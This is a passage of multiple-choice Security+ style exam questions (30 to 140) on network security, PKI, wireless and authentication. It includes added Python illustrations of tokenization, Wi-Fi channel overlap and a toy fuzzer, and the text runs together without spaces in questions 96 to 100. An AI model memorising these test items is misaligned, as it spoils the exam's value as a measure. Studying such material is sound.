C. Disable Spanning Tree Protocol.

D. Enable Root Guard.

30. Charles finds a PFX formatted file on the system he is reviewing. What is a PFX file capable of containing?

A. Only certificates and chain certificates, not private keys

B. Only a private key

C. A server certificate, intermediate certificates, and the private key

D. None of the above, because PFX files are used for certificate requests only

31. Which device would most likely process the following rules?

PERMIT IP ANY EQ 443

DENY IP ANY ANY

A. NIPS

B. HIPS

C. Content filter

D. Firewall

32. Ted wants to use IP reputation information to protect his network and knows that third parties provide that information. How can he get this data, and what secure protocol is he most likely to use to retrieve it?

A. A subscription service, SAML

B. A VDI, XML

C. A subscription service, HTTPS

D. An FDE, XML

33. What does setting the secure attribute for an HTTP cookie result in?

A. Cookies will be stored in encrypted form.

B. Cookies will be sent only over HTTPS.

C. Cookies will be stored in hashed form.

D. Cookies must be accessed using a cookie key.

34. Charles wants to use IPSec and needs to be able to determine the IPSec policy for traffic based on the port it is being sent to on the remote system. Which IPSec mode should he use?

A. IPSec tunnel mode

B. IPSec IKE mode

C. IPSec PSK mode

D. IPSec transport mode

35. Wi-Fi Protected Setup (WPS) includes four modes for adding devices to a network. Which mode has significant security concerns due to a brute-force exploit?

A. PIN

B. USB

C. Push button

D. Near-field communication

36. Claire wants to check whether a certificate has been revoked. What protocol is used to validate certificates?

A. RTCP

B. CRBL

C. OCSP

D. PKCRL

37. Nick is responsible for cryptographic keys in his company. What is the best way to deauthorize a public key?

A. Send out a network alert.

B. Delete the digital certificate.

C. Publish that certificate in the CRL.

D. Notify the RA.

38. What two connection methods are used for most geofencing applications?

A. Cellular and GPS

B. USB and Bluetooth

C. GPS and Wi-Fi

D. Cellular and Bluetooth

39. Gabriel is setting up a new e-commerce server. He is concerned about security issues. Which of the following would be the best location to place an e-commerce server?

A. DMZ

B. Intranet

C. Guest network

D. Extranet

40. Janelle is the security administrator for a small company. She is trying to improve security throughout the network. Which of the following steps should she take first?

A. Implement antimalware on all computers.

B. Implement acceptable use policies.

C. Turn off unneeded services on all computers.

D. Set password reuse policies.

41. Ben is responsible for a new application with a worldwide user base that will allow users to sign up to access existing data about them. He would like to use a method of authentication that will permit him to verify that users are the correct people to match up with their accounts. How can he validate these users?

A. Require that they present their Social Security number.

B. Require them to use a federated identity via Google.

C. Require them to use knowledge-based authentication.

D. Require them to validate an email sent to the account they signed up with.

42. Jason wants to implement a remote access virtual private network (VPN) for users in his organization who primarily rely on hosted web applications. What common VPN type is best suited to this if he wants to avoid deploying client software to his end-user systems?

A. A TLS VPN

B. An RDP (Remote Desktop Protocol) VPN

C. An Internet Control Message Protocol (ICMP) VPN

D. An IPSec VPN

43. Juan is a network administrator for an insurance company. His company has a number of traveling salespeople. He is concerned about confidential data on their laptops. What is the best way for him to address this?

A. FDE

B. TPM

C. SDN

D. DMZ

44. Which design concept limits access to systems from outside users while protecting users and systems inside the LAN?

A. DMZ

B. VLAN

C. Router

D. Guest network

45. Nina wants to use information about her users like their birthdates, addresses, and job titles as part of her identity management system. What term is used to describe this type of information?

A. Roles

B. Factors

C. Identifiers

D. Attributes

46. Megan is preparing a certificate signing request (CSR) and knows that she needs to provide a CN for her web server. What information will she put into the CN field for the CSR?

A. Her name

B. The hostname

C. The company's name

D. The fully qualified domain name of the system

47. Which of the following is the equivalent of a VLAN from a physical security perspective?

A. Perimeter security

B. Partitioning

C. Security zones

D. Firewall

48. Nelson uses a tool that lists the specific applications that can be installed and run on a system. The tool uses hashes of the application's binary to identify each application to ensure that the application matches the filename provided for it. What type of tool is Nelson using?

A. Antivirus

B. Blacklisting

C. Antimalware

D. Whitelisting

49. Which type of firewall examines the content and context of each packet it encounters?

A. Packet filtering firewall

B. Stateful packet filtering firewall

C. Application layer firewall

D. Gateway firewall

50. As part of his wireless network deployment efforts, Scott generates the image shown here. What term is used to describe this type of visualization of wireless networks?

A. A heatmap

B. A network diagram

C. A zone map

D. A DMZ

51. You're designing a new network infrastructure so that your company can allow unauthenticated users connecting from the Internet to access certain areas. Your goal is to protect the internal network while providing access to those areas. You decide to put the web server on a separate subnet open to public contact. What is this subnet called?

A. Guest network

B. DMZ

C. Intranet

D. VLAN

52. Madhuri's web application converts numbers that are input into fields by specifically typing them and then applies strict exception handling. It also sets a minimum and maximum length for the inputs that it allows and uses predefined arrays of allowed values for inputs like months or dates. What term describes the actions that Madhuri's application is performing?

A. Buffer overflow prevention

B. String injection

C. Input validation

D. Schema validation

53. You're outlining your plans for implementing a wireless network to upper management. What wireless security standard should you adopt if you don't want to use enterprise authentication but want to provide secure authentication for users that doesn't require a shared password or passphrase?

A. WPA3

B. WPA

C. WPA2

D. WEP

54. Brandon wants to ensure that his intrusion prevention system (IPS) is able to stop attack traffic. Which deployment method is most appropriate for this requirement?

A. Inline, deployed as an IPS

B. Passive via a tap, deployed as an IDS

C. Inline, deployed as an IDS

D. Passive via a tap, deployed as an IPS

55. You are the chief security officer (CSO) for a large company. You have discovered malware on one of the workstations. You are concerned that the malware might have multiple functions and might have caused more security issues with the computer than you can currently detect. What is the best way to test this malware?

A. Leave the malware on that workstation until it is tested.

B. Place the malware in a sandbox environment for testing.

C. It is not important to analyze or test it; just remove it from the machine.

D. Place the malware on a honeypot for testing.

56. You are trying to increase security at your company. You're currently creating an outline of all the aspects of security that will need to be examined and acted on. Which of the following terms describes the process of improving security in a trusted OS?

A. FDE

B. Hardening

C. SED

D. Baselining

57. Melissa's website provides users who access it via HTTPS with a Transport Layer Security (TLS) connection. Unfortunately, Melissa forgot to renew her certificate, and it is presenting users with an error. What happens to the HTTPS connection when a certificate expires?

A. All traffic will be unencrypted.

B. Traffic for users who do not click OK at the certificate error will be unencrypted.

C. Trust will be reduced, but traffic will still be encrypted.

D. Users will be redirected to the certificate authority's site for a warning until the certificate is renewed.

58. Isaac is reviewing his organization's secure coding practices document for customer-facing web applications and wants to ensure that their input validation recommendations are appropriate. Which of the following is not a common best practice for input validation?

A. Ensure validation occurs on a trusted server.

B. Validate all client-supplied data before it is processed.

C. Validate expected data types and ranges.

D. Ensure validation occurs on a trusted client.

59. Frank knows that the systems he is deploying have a built-in TPM module. Which of the following capabilities is not a feature provided by a TPM?

A. A random number generator

B. Remote attestation capabilities

C. A cryptographic processor used to speed up SSL/TLS

D. The ability to bind and seal data

60. What is the primary use of hashing in databases?

A. To encrypt stored data, thus preventing exposure

B. For indexing and retrieval

C. To obfuscate data

D. To substitute for sensitive data, allowing it to be used without exposure

61. Hans is a security administrator for a large company. Users on his network visit a wide range of websites. He is concerned they might get malware from one of these many websites. Which of the following would be his best approach to mitigate this threat?

A. Implement host-based antivirus.

B. Blacklist known infected sites.

C. Set browsers to allow only signed components.

D. Set browsers to block all active content (ActiveX, JavaScript, etc.).

62. Zarmeenah has implemented wireless authentication for her network using a passphrase that she distributes to each member of her organization. What type of authentication method has she implemented?

A. Enterprise

B. PSK

C. Open

D. Captive portal

63. Olivia is building a wireless network and wants to implement an Extensible Authentication Protocol (EAP)-based protocol for authentication. What EAP version should she use if she wants to prioritize reconnection speed and doesn't want to deploy client certificates for authentication?

A. EAP-FAST

B. EAP-TLS

C. PEAP

D. EAP-TTLS

64. You work at a large company. You are concerned about ensuring that all workstations have a common configuration, that no rogue software is installed, and that all patches are kept up to date. Which of the following would be the most effective for accomplishing this?

A. Use VDI.

B. Implement restrictive policies.

C. Use an image for all workstations.

D. Implement strong patch management.

65. Naomi has deployed her organization's cloud-based virtual datacenters to multiple Google datacenter locations around the globe. What does this design provide for her systems?

A. Resistance to insider attacks

B. High availability across multiple zones

C. Decreased costs

D. Vendor diversity

66. Patrick wants to deploy a virtual private networking (VPN) technology that is as easy for end users to use as possible. What type of VPN should he deploy?

A. An IPSec VPN

B. An SSL/TLS VPN

C. An HTML5 L2TP VPN

D. A SAML VPN

67. Olivia is responsible for web application security for her company's e-commerce server. She is particularly concerned about XSS and SQL injection. Which technique would be most effective in mitigating these attacks?

A. Proper error handling

B. The use of stored procedures

C. Proper input validation

D. Code signing

68. Isaac wants to prevent corporate mobile devices from being used outside of his company's buildings and corporate campus. What mobile device management (MDM) capability should he use to allow this?

A. Patch management

B. IP filtering

C. Geofencing

D. Network restrictions

69. Sophia wants to test her company's web application to see if it is handling input validation and data validation properly. Which testing method would be most effective for this?

A. Static code analysis

B. Fuzzing

C. Baselining

D. Version control

70. Alaina has implemented an HSM. Which of the following capabilities is not a typical HSM feature?

A. Encryption and decryption for digital signatures

B. Boot attestation

C. Secure management of digital keys

D. Strong authentication support

71. Cynthia wants to issue contactless cards to provide access to the buildings she is tasked with securing. Which of the following technologies should she deploy?

A. RFID

B. Wi-Fi

C. Magstripe

D. HOTP

72. Alaina wants to prevent bulk gathering of email addresses and other directory information from her web-exposed LDAP directory. Which of the following solutions would not help with this?

A. Using a back-off algorithm

B. Implementing LDAPS

C. Requiring authentication

D. Rate limiting queries

73. Alaina has been told that her organization uses a SAN certificate in their environment. What does this tell Alaina about the certificate in use in her organization?

A. It is used for a storage area network.

B. It is provided by SANS, a network security organization.

C. The certificate is part of a self-signed, self-assigned namespace.

D. The certificate allows multiple hostnames to be protected by the same certificate.

74. Edward is responsible for web application security at a large insurance company. One of the applications that he is particularly concerned about is used by insurance adjusters in the field. He wants to have strong authentication methods to mitigate misuse of the application. What would be his best choice?

A. Authenticate the client with a digital certificate.

B. Implement a very strong password policy.

C. Secure application communication with Transport Layer Security (TLS).

D. Implement a web application firewall (WAF).

75. Sarah is the CIO for a small company. The company uses several custom applications that have complicated interactions with the host operating system. She is concerned about ensuring that systems on her network are all properly patched. What is the best approach in her environment?

A. Implement automatic patching.

B. Implement a policy that has individual users patch their systems.

C. Delegate patch management to managers of departments so that they can find the best patch management for their departments.

D. Immediately deploy patches to a test environment; then as soon as testing is complete, have a staged rollout to the production network.

76. Gary uses a wireless analyzer to perform a site survey of his organization. Which of the following is not a common feature of a wireless analyzer's ability to provide information about the wireless networks around it?

A. The ability to show signal strength of access points on a map of the facility

B. The ability to show the version of the RADIUS server used for authentication

C. The ability to show a list of SSIDs available in a given location

D. The ability to show the version of the 802.11 protocol (n, ac, ax)

77. Emiliano is a network administrator and is concerned about the security of peripheral devices. Which of the following would be a basic step he could take to improve security for those devices?

A. Implement FDE.

B. Turn off remote access (SSH, Telnet, etc.) if not needed.

C. Utilize fuzz testing for all peripherals.

D. Implement digital certificates for all peripherals.

78. What type of code analysis is manual code review?

A. Dynamic code review

B. Fagan code review

C. Static code review

D. Fuzzing

79. Samantha has used ssh-keygen to generate new SSH keys. Which SSH key should she place on the server she wants to access, and where is it typically stored on a Linux system?

A. Her public SSH key, /etc/

B. Her private SSH key, /etc/

C. Her public SSH key, ~/.ssh

D. Her private SSH key, ~/.ssh

80. Ixxia is a software development team manager. She is concerned about memory leaks in code. What type of testing is most likely to find memory leaks?

A. Fuzzing

B. Stress testing

C. Static code analysis

D. Normalization

81. What IP address does a load balancer provide for external connections to connect to web servers in a load-balanced group?

A. The IP address for each server, in a prioritized order

B. The load balancer's IP address

C. The IP address for each server in a round-robin order

D. A virtual IP address

82. What term describes random bits that are added to a password before it is hashed and stored in a database?

A. Flavoring

B. Rainbow-armor

C. Bit-rot

D. Salt

83. Victor is a network administrator for a medium-sized company. He wants to be able to access servers remotely so that he can perform small administrative tasks from remote locations. Which of the following would be the best protocol for him to use?

A. SSH

B. Telnet

C. RSH

D. SNMP

84. Dan configures a resource-based policy in his Amazon account. What control has he deployed?

A. A control that determines who has access to the resource, and the actions they can take on it

B. A control that determines the amount that service can cost before an alarm is sent

C. A control that determines the amount of a finite resource that can be consumed before an alarm is set

D. A control that determines what an identity can do

85. Charlene's company uses rack-mounted sensor appliances in their datacenter. What are sensors like these typically monitoring?

A. Temperature and humidity

B. Smoke and fire

C. Power quality and reliability

D. None of the above

86. Laurel is reviewing the configuration for an email server in her organization and discovers that there is a service running on TCP port 993. What secure email service has she most likely discovered?

A. Secure POP3

B. Secure SMTP

C. Secure IMAP (IMAPS)

D. Secure MIME (SMIME)

87. What type of topology does an ad hoc wireless network use?

A. Point-to-multipoint

B. Star

C. Point-to-point

D. Bus

88. What is the primary advantage of allowing only signed code to be installed on computers?

A. It guarantees that malware will not be installed.

B. It improves patch management.

C. It verifies who created the software.

D. It executes faster on computers with a Trusted Platform Module (TPM).

89. Samantha has been asked to provide a recommendation for her organization about password security practices. Users have complained that they have to remember too many passwords as part of their job and that they need a way to keep track of them. What should Samantha recommend?

A. Recommend that users write passwords down near their workstation.

B. Recommend that users use the same password for sites with similar data or risk profiles.

C. Recommend that users change their standard passwords slightly based on the site they are using.

D. Recommend a password vault or manager application.

90. Matt has enabled port security on the network switches in his building. What does port security do?

A. Filters by MAC address

B. Prevents routing protocol updates from being sent from protected ports

C. Establishes private VLANs

D. Prevents duplicate MAC addresses from connecting to the network

91. Tom is responsible for VPN connections in his company. His company uses IPSec for VPNs. What is the primary purpose of AH in IPSec?

A. Encrypt the entire packet.

B. Encrypt just the header.

C. Authenticate the entire packet.

D. Authenticate just the header.

92. Miles wants to ensure that his internal DNS cannot be queried by outside users. What DNS design pattern uses different internal and external DNS servers to provide potentially different DNS responses to users of those networks?

A. DNSSEC

B. Split horizon DNS

C. DMZ DNS

D. DNS proxying

93. Abigail is responsible for setting up a network-based intrusion prevention system (NIPS) on her network. The NIPS is located in one particular network segment. She is looking for a passive method to get a copy of all traffic to the NIPS network segment so that it can analyze the traffic. Which of the following would be her best choice?

A. Using a network tap

B. Using port mirroring

C. Setting the NIPS on a VLAN that is connected to all other segments

D. Setting up a NIPS on each segment

94. Amanda wants to allow users from other organizations to log in to her wireless network. What technology would allow her to do this using their own home organization's credentials?

A. Preshared keys

B. 802.11q

C. RADIUS federation

D. OpenID Connect

95. Nathan wants to ensure that the mobile devices his organization has deployed can only be used in the company's facilities. What type of authentication should he deploy to ensure this?

A. PINs

B. Biometrics

C. Context-aware authentication

D. Content-aware authentication

96. WhichofthefollowingbestdescribesaTPM?

A. TransportProtectionMode

B. Asecurecryptoprocessor

C. ADNSSECextension

D. TotalPatchManagement

97. JaniceisexplaininghowIPSecworkstoanewnetworkadministrator.SheistryingtoexplaintheroleofIKE.WhichofthefollowingmostcloselymatchestheroleofIKEinIPSec?

A. Itencryptsthepacket.

B. ItestablishestheSAs.

C. Itauthenticatesthepacket.

D. Itestablishesthetunnel.

98. Whatcertificateismostlikelytobeusedbyanofflinecertificateauthority(CA)?

A. Root

B. Machine/computer

C. User

D. Email

99. EmilymanagestheIDS/IPSforhernetwork.Shehasanetwork-basedintrusionpreventionsystem(NIPS)installedandproperlyconfigured.Itisnotdetectingobviousattacksononespecificnetworksegment.ShehasverifiedthattheNIPSisproperlyconfiguredandworkingproperly.Whatwouldbethemostefficientwayforhertoaddressthis?

A. Implementportmirroringforthatsegment.

B. InstallaNIPSonthatsegment.

C. UpgradetoamoreeffectiveNIPS.

D. IsolatethatsegmentonitsownVLAN.

Telegram Channel @nettrain

100. Danawantstoprotectdatainadatabasewithoutchangingcharacteristicslikethedatalengthandtype.Whattechniquecansheusetodothismosteffectively?

A. Hashing

B. Tokenization

C. Encryption

D. Rotation
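Question 100 turns on the difference between tokenization, hashing and encryption. The following is an added example in Python, not code from the book: a vault-based tokenizer that replaces each character with a random character of the same class (digits stay digits, letters stay letters, separators are kept), so the token has the same length and type as the original, while a SHA-256 hash of the same value is 64 hex characters. The vault class, the sample card number and the sample SSN are constructed for illustration; a real deployment keeps the vault in a separately secured store.

```python
import hashlib
import secrets
import string
from typing import Dict

# Constructed sample values for illustration only (not real customer data).
SAMPLE_PAN = "4111111111111111"
SAMPLE_SSN = "123-45-6789"


def _random_same_class(ch: str) -> str:
    """Pick a CSPRNG character from the same class as ch; separators are kept as-is."""
    if ch.isdigit():
        return secrets.choice(string.digits)
    if ch.isupper():
        return secrets.choice(string.ascii_uppercase)
    if ch.islower():
        return secrets.choice(string.ascii_lowercase)
    return ch


def shape(value: str) -> str:
    """Character-class signature, used to show that a token keeps length and type."""
    return "".join(
        "9" if c.isdigit() else "A" if c.isupper() else "a" if c.islower() else c
        for c in value
    )


class TokenVault:
    """Vault-based tokenization: the token carries no information about the value;
    the only way back is the mapping held inside the vault."""

    def __init__(self) -> None:
        self._by_value: Dict[str, str] = {}
        self._by_token: Dict[str, str] = {}

    def tokenize(self, value: str) -> str:
        if value in self._by_value:          # same value -> same token within this vault
            return self._by_value[value]
        while True:
            token = "".join(_random_same_class(c) for c in value)
            if token != value and token not in self._by_token:
                break                        # reject the (negligibly rare) collisions
        self._by_value[value] = token
        self._by_token[token] = value
        return token

    def detokenize(self, token: str) -> str:
        """Only callers with vault access (a separately protected system) can do this."""
        return self._by_token[token]


def sha256_hex(value: str) -> str:
    """For contrast: hashing is one-way and changes both the length and the character set."""
    return hashlib.sha256(value.encode()).hexdigest()
```

Ordinary encryption has the same drawback as hashing for this requirement: an AES-CBC ciphertext of a 16-digit card number is binary and block-padded, so the column type would have to change. That is why the question's answer is tokenization (or, outside the exam, format-preserving encryption).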

101. Elenora is responsible for log collection and analysis for a company with locations around the country. She has discovered that remote sites generate high volumes of log data, which can cause bandwidth consumption issues for those sites. What type of technology could she deploy to each site to help with this?

A. Deploy a log aggregator.

B. Deploy a honeypot.

C. Deploy a bastion host.

D. None of the above

102. Dani is performing a dynamic code analysis technique that sends a broad range of data as inputs to the application she is testing. The inputs include data that is both within the expected ranges and types for the program and data that is different and, thus, unexpected by the program. What code testing technique is Dani using?

A. Timeboxing

B. Buffer overflow

C. Input validation

D. Fuzzing

103. Tina wants to ensure that rogue DHCP servers are not permitted on the network she maintains. What can she do to protect against this?

A. Deploy an IDS to stop rogue DHCP packets.

B. Enable DHCP snooping.

C. Disable DHCP snooping.

D. Block traffic on the DHCP ports to all systems.

104. Endpoint detection and response has three major components that make up its ability to provide visibility into endpoints. Which of the following is not one of those three parts?

A. Data search

B. Malware analysis

C. Data exploration

D. Suspicious activity detection

105. Isabelle is responsible for security at a mid-sized company. She wants to prevent users on her network from visiting job-hunting sites while at work. Which of the following would be the best device to accomplish this goal?

A. Proxy server

B. NAT

C. A packet filter firewall

D. NIPS

106. What term describes a cloud system that stores, manages, and allows auditing of API keys, passwords, and certificates?

A. A cloud PKI

B. A cloud TPM

C. A secrets manager

D. A hush service

107. Fred is building a web application that will receive information from a service provider. What open standard should he design his application to use to work with many modern third-party identity providers?

A. SAML

B. Kerberos

C. LDAP

D. NTLM

108. You are responsible for an e-commerce site. The site is hosted in a cluster. Which of the following techniques would be best in assuring availability?

A. A VPN concentrator

B. Aggregate switching

C. An SSL accelerator

D. Load balancing

109. Which channels do not suffer from channel overlap in U.S. installations of 2.4 GHz Wi-Fi networks?

A. 1, 3, 5, 7, 9, and 11

B. 2, 6, and 10

C. 1, 6, and 11

D. Wi-Fi channels do not suffer from channel overlap.
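Question 109's answer follows from the channel plan rather than from memorization. As an added example in Python (not from the book): 2.4 GHz channels are spaced 5 MHz apart with centers at 2407 + 5n MHz (channel 14, not permitted in the U.S., sits at 2484 MHz), and a DSSS channel is 22 MHz wide, so two channels interfere unless their centers are at least 22 MHz apart. The functions below compute the largest set of mutually non-overlapping channels from the FCC-permitted channels 1 to 11; the channel-width constant is the modeling assumption that drives the result.

```python
from typing import Iterable, List

CHANNEL_WIDTH_MHZ = 22            # 802.11b DSSS channel width (assumption for the model)
US_CHANNELS = range(1, 12)        # channels 1-11 are permitted in the U.S.


def center_mhz(channel: int) -> int:
    """Center frequency of a 2.4 GHz channel per the 802.11 channel plan."""
    if channel == 14:
        return 2484                # channel 14 is the odd one out (Japan only)
    return 2407 + 5 * channel


def overlap(a: int, b: int, width: int = CHANNEL_WIDTH_MHZ) -> bool:
    """Two channels overlap when their center spacing is less than the channel width."""
    return abs(center_mhz(a) - center_mhz(b)) < width


def all_disjoint(channels: Iterable[int], width: int = CHANNEL_WIDTH_MHZ) -> bool:
    """True when no pair in the set overlaps; use it to check a proposed channel plan."""
    chans = list(channels)
    return all(not overlap(x, y, width)
               for i, x in enumerate(chans) for y in chans[i + 1:])


def max_nonoverlapping(channels: Iterable[int] = US_CHANNELS,
                       width: int = CHANNEL_WIDTH_MHZ) -> List[int]:
    """Greedy lowest-first selection; optimal for equal-width intervals on a line."""
    chosen: List[int] = []
    for ch in sorted(channels):
        if all(not overlap(ch, c, width) for c in chosen):
            chosen.append(ch)
    return chosen
```

The same function explains the European four-channel plan: with channels 1 to 13 available and the 20 MHz OFDM width of 802.11g/n, `max_nonoverlapping(range(1, 14), width=20)` yields 1, 5, 9 and 13.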

110. Ryan is concerned about the security of his company's web application. Since the application processes confidential data, he is most concerned about data exposure. Which of the following would be the most important for him to implement?

A. WAF

B. TLS

C. NIPS

D. NIDS

111. Which of the following connection methods only works via a line-of-sight connection?

A. Bluetooth

B. Infrared

C. NFC

D. Wi-Fi

112. Carole is responsible for various network protocols at her company. The Network Time Protocol has been intermittently failing. Which of the following would be most affected?

A. Kerberos

B. RADIUS

C. CHAP

D. LDAP

113. You are selecting an authentication method for your company's servers. You are looking for a method that periodically reauthenticates clients to prevent session hijacking. Which of the following would be your best choice?

A. PAP

B. SPAP

C. CHAP

D. OAuth

114. Naomi wants to deploy a firewall that will protect her endpoint systems from other systems in the same security zone of her network as part of a zero-trust design. What type of firewall is best suited to this type of deployment?

A. Hardware firewalls

B. Software firewalls

C. Virtual firewalls

D. Cloud firewalls

115. Lisa is setting up accounts for her company. She wants to set up accounts for the Oracle database server. Which of the following would be the best type of account to assign to the database service?

A. User

B. Guest

C. Admin

D. Service

116. Gary wants to implement EAP-based protocols for his wireless authentication and wants to ensure that he uses only versions that support Transport Layer Security (TLS). Which of the following EAP-based protocols does not support TLS?

A. LEAP

B. EAP-TTLS

C. PEAP

D. EAP-TLS

117. Manny wants to download apps that aren't in the iOS App Store, as well as change settings at the OS level that Apple does not normally allow to be changed. What would he need to do to his iPhone to allow this?

A. Buy an app via a third-party app store.

B. Install an app via side-loading.

C. Jailbreak the phone.

D. Install Android on the phone.

118. Many smart cards implement a wireless technology to allow them to be used without a card reader. What wireless technology is frequently used to allow the use of smart cards for entry-access readers and similar access controls?

A. Infrared

B. Wi-Fi

C. RFID

D. Bluetooth

119. Carl has been asked to set up access control for a server. The requirements state that users at a lower privilege level should not be able to see or access files or data at a higher privilege level. What access control model would best fit these requirements?

A. MAC

B. DAC

C. RBAC

D. SAML

120. Jack wants to deploy a network access control (NAC) system that will stop systems that are not fully patched from connecting to his network. If he wants to have full details of system configuration, antivirus version, and patch level, what type of NAC deployment is most likely to meet his needs?

A. Agentless, preadmission

B. Agent-based, preadmission

C. Agentless, postadmission

D. Agent-based, postadmission

121. Claire has been notified of a zero-day flaw in a web application. She has the exploit code, including a SQL injection attack that is being actively exploited. How can she quickly react to prevent this issue from impacting her environment if she needs the application to continue to function?

A. Deploy a detection rule to her IDS.

B. Manually update the application code after reverse-engineering it.

C. Deploy a fix via her WAF.

D. Install the vendor-provided patch.

122. Eric wants to provide company-purchased devices, but his organization prefers to provide end users with choices among devices that can be managed and maintained centrally. What mobile device deployment model best fits this need?

A. BYOD

B. COPE

C. CYOD

D. VDI

123. Derek is in charge of his organization's certificate authorities and wants to add a new certificate authority. His organization already has three certificate authorities operating in a mesh: A, the South American CA; B, the United States CA; and C, the European Union CA. As they expand into Australia, he wants to add D, the Australian CA. Which CAs will Derek need to issue certificates to from D to ensure that systems in the Australian domain are able to access servers in A, B, and C's domains?

A. He needs all the other systems to issue D certificates so that his systems will be trusted there.

B. He needs to issue certificates from D to each of the other CAs' systems and then have the other CAs issue D a certificate.

C. He needs to provide the private key from D to each of the other CAs.

D. He needs to receive the private key from each of the other CAs and use it to sign the root certificate for D.

124. Claire is concerned about an attacker getting information regarding network devices and their configuration in her company. Which protocol should she implement that would be most helpful in mitigating this risk while providing management and reporting about network devices?

A. RADIUS

B. TLS

C. SNMPv3

D. SFTP

125. Ben is using a tool that is specifically designed to send unexpected data to a web application that he is testing. The application is running in a test environment and is configured to log events and changes. What type of tool is Ben using?

A. A SQL injection proxy

B. A static code review tool

C. A web proxy

D. A fuzzer
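Questions 102 and 125 both describe fuzzing. As an added example in Python (not from the book), here is a minimal mutation fuzzer run against a constructed record parser: half of the inputs are well-formed records in a toy `length | payload | checksum` format, the other half are mutations of such records (a bit flip, truncation, or an oversized length prefix). The parser's documented rejection is `ValueError`; anything else that escapes is a finding. The vulnerable parser trusts the length prefix; the hardened one checks it, and the same fuzzer finds nothing against it. The record format, both parsers and the mutation strategies are constructed for this example.

```python
import random
from typing import Callable, List, Tuple


def parse_record(data: bytes) -> bytes:
    """Constructed vulnerable parser. Format: len | payload[len] | checksum.
    It trusts the length prefix, so an oversized prefix (or an empty input)
    indexes past the end of the buffer."""
    n = data[0]
    payload = data[1:1 + n]
    checksum = data[1 + n]                       # IndexError when n overruns the buffer
    if (sum(payload) & 0xFF) != checksum:
        raise ValueError("bad checksum")         # documented rejection, not a crash
    return payload


def parse_record_hardened(data: bytes) -> bytes:
    """Same format with the bounds checks the fuzzer shows are missing."""
    if len(data) < 2:
        raise ValueError("record too short")
    n = data[0]
    if len(data) != 2 + n:
        raise ValueError("length prefix does not match record size")
    payload = data[1:1 + n]
    if (sum(payload) & 0xFF) != data[1 + n]:
        raise ValueError("bad checksum")
    return payload


def make_valid_record(rng: random.Random) -> bytes:
    """In-range input: a random payload of 0-31 bytes with a correct checksum."""
    payload = bytes(rng.randrange(256) for _ in range(rng.randrange(32)))
    return bytes([len(payload)]) + payload + bytes([sum(payload) & 0xFF])


def mutate(rec: bytes, rng: random.Random) -> bytes:
    """Out-of-range input: one of three simple mutations of a valid record."""
    b = bytearray(rec)
    op = rng.randrange(3)
    if op == 0:                                   # flip one bit anywhere (may hit the prefix)
        i = rng.randrange(len(b))
        b[i] ^= 1 << rng.randrange(8)
    elif op == 1:                                 # truncate, possibly to nothing
        b = b[:rng.randrange(len(b) + 1)]
    else:                                         # oversized length prefix
        b[0] = rng.randrange(len(b), 256)
    return bytes(b)


def fuzz(target: Callable[[bytes], bytes], iterations: int = 2000,
         seed: int = 1) -> List[Tuple[bytes, str]]:
    """Run the target on alternating valid and mutated records; collect inputs
    that raise anything other than the parser's ValueError."""
    rng = random.Random(seed)
    findings: List[Tuple[bytes, str]] = []
    for i in range(iterations):
        rec = make_valid_record(rng)
        if i % 2:
            rec = mutate(rec, rng)
        try:
            target(rec)
        except ValueError:
            continue
        except Exception as exc:                  # any other exception is the finding
            findings.append((rec, f"{type(exc).__name__}: {exc}"))
    return findings
```

Each finding keeps the exact input that triggered it, which is what makes a fuzzing result reproducible for the developer; in Ben's scenario (question 125) the application's own event logging plays the same role on the target side.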

126. Eric is responsible for his organization's mobile device security. They use a modern mobile device management (MDM) tool to manage a BYOD mobile device environment. Eric needs to ensure that the applications and data that his organization provides to users of those mobile devices remain as secure as possible. Which of the following technologies will provide him with the best security?

A. Storage segmentation

B. Containerization

C. Full-device encryption

D. Remote wipe

127. Murali is looking for an authentication protocol for his network. He is very concerned about highly skilled attackers. As part of mitigating that concern, he wants an authentication protocol that never actually transmits a user's password, in any form. Which authentication protocol would be a good fit for Murali's needs?

A. CHAP

B. Kerberos

C. RBAC

D. Type II

128. As part of the certificate issuance process from the CA that her company works with, Marie is required to prove that she is a valid representative of her company. The CA goes through additional steps to ensure that she is who she says she is and that her company is legitimate, and not all CAs can issue this type of certificate. What type of certificate has she been issued?

A. An EV certificate

B. A domain-validated certificate

C. An organization validation certificate

D. An OCSP certificate

129. Mark wants to provide a wireless connection with the highest possible amount of bandwidth. Which of the following should he select?

A. LTE cellular

B. Bluetooth

C. NFC

D. 802.11ac Wi-Fi

130. What is the primary advantage of cloud-native security solutions when compared to third-party solutions deployed to the same cloud environment?

A. Lower cost

B. Better security

C. Tighter integration

D. All of the above

131. Ed needs to securely connect to a DMZ from an administrative network using Secure Shell (SSH). What type of system is frequently deployed to allow this to be done securely across security boundaries for network segments with different security levels?

A. An IPS

B. A NAT gateway

C. A router

D. A jump box

132. You work for a social media website. You wish to integrate your users' accounts with other web resources. To do so, you need to allow authentication to be used across different domains, without exposing your users' passwords to these other services. Which of the following would be most helpful in accomplishing this goal?

A. Kerberos

B. SAML

C. OAuth

D. OpenID

133. Christina wants to ensure that session persistence is maintained by her load balancer. What is she attempting to do?

A. Ensure that all of a client's requests go to the same server for the duration of a given session or transaction.

B. Assign the same internal IP address to clients whenever they connect through the load balancer.

C. Ensure that all transactions go to the current server in a round-robin during the time it is the primary server.

D. Assign the same external IP address to all servers whenever they are the primary server assigned by the load balancer.

134. Tara is concerned about staff in her organization sending email with sensitive information like customer Social Security numbers (SSNs) included in it. What type of solution can she implement to help prevent inadvertent exposures of this type of sensitive data?

A. FDE

B. DLP

C. S/MIME

D. POP3S

135. Jennifer is considering using an infrastructure as a service cloud provider to host her organization's web application, database, and web servers. Which of the following is not a reason that she would choose to deploy to a cloud service?

A. Support for high availability

B. Direct control of underlying hardware

C. Reliability of underlying storage

D. Replication to multiple geographic zones

136. This image shows an example of a type of secure management interface. What term describes using management interfaces or protected alternate means to manage devices and systems?

A. A DMZ

B. Out-of-band management

C. In-band management

D. A TLS

137. Chris has provided the BitLocker encryption keys for computers in his department to his organization's security office so that they can decrypt computers in the event of a breach or investigation. What is this concept called?

A. Key escrow

B. A BitLocker Locker

C. Key submission

D. AES jail

138. Marek has configured systems in his network to perform boot attestation. What has he configured the systems to do?

A. To run only trusted software based on previously stored hashes using a chained boot process

B. To notify a BOOTP server when the system has booted up

C. To hash the BIOS of the system to ensure that the boot process has occurred securely

D. To notify a remote system or management tool that the boot process was secure using measurements from the boot process

139. You have been asked to find an authentication service that is handled by a third party. The service should allow users to access multiple websites, as long as they support the third-party authentication service. What would be your best choice?

A. OpenID

B. Kerberos

C. NTLM

D. Shibboleth

140. Which of the following steps is a common way to harden the Windows registry?

